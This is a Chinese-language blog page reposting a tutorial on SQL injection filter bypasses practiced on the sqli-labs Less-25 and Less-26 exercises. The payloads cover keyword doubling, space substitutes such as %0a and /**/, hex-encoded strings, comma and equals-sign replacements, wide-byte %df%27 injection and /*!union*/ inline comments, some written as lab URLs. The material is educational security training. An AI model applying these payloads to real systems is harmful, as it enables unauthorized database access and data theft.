当前位置: 首页 > news >正文

制作个简单公司网站要多少钱/南昌百度推广公司

制作个简单公司网站要多少钱,南昌百度推广公司,网上书城网站开发意义,番禺建设银行网站SQL注入绕过 基本思路 基本思路找到一种可替换的符号或者可替换的逻辑语句。 --------------------------------------------------------分隔符--------------------------------------------------- 过滤关键字 1、and与or的过滤 1)替换 or---> || and-…

SQL注入绕过

基本思路

基本思路找到一种可替换的符号或者可替换的逻辑语句。

--------------------------------------------------------分隔符---------------------------------------------------

过滤关键字
1、and与or的过滤

1)替换

or---> ||
and--> &&

2)形变或者大小写

and -> anandd
and -> And/AND
Less25–and和or的过滤

在这里插入图片描述
1)判断闭合方式
如果判断错误(图2),则页面不变,如果判断成功,页面会报错(图1)
在这里插入图片描述
在这里插入图片描述
再进一步判断:页面会报错
http://192.168.168.135/sqli-labs-master/Less-25/?id=1‘ and 1=1 --+

注意:报错是因为后台存在防御机制

2)做绕过:and的绕过也有好几种,但是有些能成功,有些也被做了防御,所以需要进行试探

http://192.168.168.135/sqli-labs-master/Less-25/?id=1’ anandd 1=1 --+

--------------------------------------------------------分隔符---------------------------------------------------

2、空格的绕过

1)替换

%0a,%0b,%0c,%0d,%a0,%00,/**/,/*!*/,(),[]   都能起到隔开两个命令、语句的作用

Less26:空格的绕过、注释符

http://192.168.168.135/sqli-labs-master/Less-26/?id=1'and%0b'1'='1

--------------------------------------------------------分隔符---------------------------------------------------

3、引号绕过
hex编码
where schema_name='security'
where schema_name=0xyyyyyyy   //hex编码替换
where schema_name=database()  //函数替换

--------------------------------------------------------分隔符---------------------------------------------------

4、逗号绕过
select mid('abc',1,1);
select mid('abc' from 1 for 1);  //用from for替换
select 1,2;     select from 1 for 2;   //出错,逗号应该是逻辑上的替换
select 1;
=select * from (select 1)a
select 1,2,3;
=select * from (select 1)a join (select 2)b
select 1,2,3;
=select * from (select 1)a join (select 2)b join (select 3)c;

--------------------------------------------------------分隔符---------------------------------------------------

5、等号、大于号、小于号绕过
=    ---like
select id from users where username='admin';
=select id from users where username like 'admin';   //like替换等号greatest和least
select hex(mid('abc',1,1))>1;
=select least(hex(mid('abc',1,1)),1)like1;
select 1 from users where username between 2 and 1;

--------------------------------------------------------分隔符---------------------------------------------------

6、等价函数
hex()---bin()、ascii()
sleep()---waitfor()、benchmark()
mid() ---substr()、substring()

--------------------------------------------------------分隔符---------------------------------------------------

7、宽字节注入–绕过单引号、双引号过滤
%7e  %7e%15
某个汉字=%df%27  %df=\  %27='

后台机制会给特殊字符添加转义字符来达到防御的目的’—>’,当你输入%5c%27,后台对%5c添加转义%df等于你输入的%5c%27组合数据就被添加为%df%5c%27,但是%df%5c是一个宽字节汉字,然后就会形成 縗%27 ->縗’

‘–>’ %5c%5c%5c%27 %df%5c%5c%5c%27 縗\’

select ‘1’’; 输出:1’
’ 语法含义的单引号,是一个闭合符
’ 字符串单引号
\’ 人为添加一个,将’转为一个闭合符
--------------------------------------------------------分隔符---------------------------------------------------

8、内联注释绕过

通过/!/ 包裹执行语句达到欺骗防御的目的

select 1,2 from users;
select username,password from users limit 0,1;
select username,password from users limit 0,1 /*!union*/ /*!all*/ /*!select*/ 1,2;  //如果过滤了union,使用内联注释包裹
http://www.jmfq.cn/news/5160763.html

相关文章:

  • 去什么网站发贴做推广/种子库
  • 网站开发 简历/新区seo整站优化公司
  • 上海礼品定制网站/百度竞价返点一般多少
  • 去视频网站做编辑器/线上培训平台
  • 网络营销中网站建设的策略/百度关键词推广一年多少钱
  • wordpress建站好不好/怎么把网站排名排上去
  • 义乌购物网站建设多少钱/关键词在线优化
  • 永久有效的代理ip/seo推广排名
  • 编程代写有哪些平台/上海牛巨微seo
  • 郑州便宜网站建设报价/百度推广账户优化方案
  • 给小说网站做编辑/关键词自助优化
  • 网站制作的前期主要是做好什么工作/网络营销推广方法十种
  • 小公司让我用织梦做网站/自己做网站建设
  • 高端网站制作建设/广告设计与制作
  • 浙江自己如何做网站/色盲测试图及答案大全
  • 太原网站制作费用/凤凰网台湾资讯
  • 徐州企业自助建站/成人英语培训
  • 空间网站链接怎么做/营销软件
  • 2022八月热点新闻摘抄/宝鸡seo
  • 青海住房与城乡建设厅网站/建设网站前的市场分析
  • 做门户网站用什么模板/郑州百度推广公司
  • 怎么做自己的一个网站/bt磁力
  • 动态网站开发语言的优势与不足/打开百度网站
  • 做视频网站要什么软件下载/网页一键生成app软件
  • 做投票的网站赚钱嘛/微信朋友圈推广软文
  • 分销网站建设方案/新闻发布
  • 福州做网站/数据网站有哪些
  • jsp网站开发学习心得/营销策划推广
  • 找人做seo要给网站程序/百度网站禁止访问怎么解除
  • 深圳营销型网站联系方式/深圳网络seo推广